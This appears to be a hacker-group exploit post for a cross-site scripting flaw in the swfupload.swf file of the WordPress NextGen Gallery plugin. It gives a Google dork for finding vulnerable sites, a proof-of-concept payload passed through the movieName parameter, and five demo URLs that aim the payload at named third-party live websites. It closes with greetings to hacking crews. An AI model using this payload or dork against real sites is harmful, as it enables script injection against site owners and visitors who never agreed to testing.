WordPress NextGen Gallery跨站脚本漏洞

[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress NextGen (swfupload.swf) Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:”/wp-content/plugins/nextgen-gallery/”
[+] Tested on: KaliLinux
[+} Friend’s blog: www.na3il.com

########################################################################################
+Exploit:
Wordpress PlugIn NextGen suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=”]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//

Demo:
http://ludotines.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//
http://lsgkerala.in/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//
http://www.apollomotors.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//
http://stoned-gatherings.com/WordPress3/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//
http://www.coachandco.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(‘HaCked%20By%20TC’);//

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################